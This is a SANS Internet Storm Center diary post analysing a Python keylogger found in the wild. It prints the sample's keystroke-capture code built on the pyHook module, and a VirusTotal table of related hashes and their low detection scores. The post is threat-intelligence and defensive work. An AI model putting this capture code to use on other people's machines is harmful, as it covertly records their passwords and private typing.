Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Simple Python Keylogger

Published: 2021-03-18
Last Updated: 2021-03-18 09:46:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if it's a juicy one or not. 

To follow up on my yesterday diary[1], Microsoft Windows provides API calls to implement a keylogger via API calls like GetKeyState() and GetAsyncKeyState() help to determine if a particular key is pressed[2]. But, can attackers implement a keylogger in other languages?

In 2019, I wrote a diary about a keylogger in PowerShell[3]. Seeing that Python becomes more and more popular in the Windows eco-system, I searched for some samples. I found one that was published as a PoC[4] already six years ago(!) but still used in the wild today. It was again submitted to VT a few weeks ago (SHA256:fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41[5]) and has still a very nice score (only 3/59).

The implementation is Python is extremely easy thanks to the pyHook module:

import  pyHook, pythoncom
data=''
def GetKeyPressedAndSendIt(event):
    global data
    if event.Ascii==13:
        keys='<ENTER>'
    elif event.Ascii==8:
        keys='<BACK SPACE>'
    elif event.Ascii==9:
        keys='<TAB>'
    else:
        keys=chr(event.Ascii)
    data=data+keys

hm = pyHook.HookManager()
hm.KeyDown = GetKeyPressedAndSendIt
hm.HookKeyboard()
pythoncom.PumpMessages(

I performed a quick retro hunt on VT to search for the same kind of script and found only 9 occurences:

Hash Type Score Upload Time
ebb80bf4d9768ed7ee9ade739304453ac3474bfdbf06d8a414563aa1bf19592f PE 3/68 2021-02-21 02:51:42 UTC
675757ca9bc6b3be10913e5a4ee43bea371ad8f826c5a25d4c0e38e90bfb1f25 PE 2/70 2021-02-17 04:48:20 UTC
79b53c72eeb936161ed8069da5e6ccddd42cc993b90ac67fb5262abc194e8797 Script 1/59 2021-02-15 11:43:15 UTC
a518235828977df57f0c3442390729affce92ed4613f8fb3cdda48f06d8712b9 Script 0/59 2021-02-02 02:07:36 UTC
cd8e126b6305cd97486877bbe1db8e3dfe2653a63d451484399f12ebff339ed3 Script 12/58 2021-02-08 22:35:34 UTC
f3d38383b0bf68204bd755ce80110915858b48c860bc7b76d91ec1c7dcb07058 Script 10/58 2021-01-22 22:22:23 UTC
395d51c3fdb2f8281cf0a9d9815f256d5f50d6eddd20d36d9eb33938be921d97 PE 13/70 2021-01-17 06:30:19 UTC
9866864b511576fe2421b469d163d8d942c29a7651c5f7f505750c70734b1183 Script 0/56 2021-01-15 14:44:05 UTC
365b45370d4db7600195c126d700de6e31d4d4084d14ff8e12a4371d84c89c85 Script 1/60 2020-12-21 00:34:00 UTC

As you can see, the peak of submitted samples occurred between mid-January and mid-February.

[1] https://isc.sans.edu/forums/diary/Defenders+Know+Your+Operating+System+Like+Attackers+Do/27212/
[2] https://gist.github.com/aktau/11057438
[3] https://isc.sans.edu/forums/diary/Simple+Powershell+Keyloggers+are+Back/24676
[4] https://github.com/HacKeD0x90/PythonKeyLogger
[5] https://www.virustotal.com/gui/file/fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
Diary Archives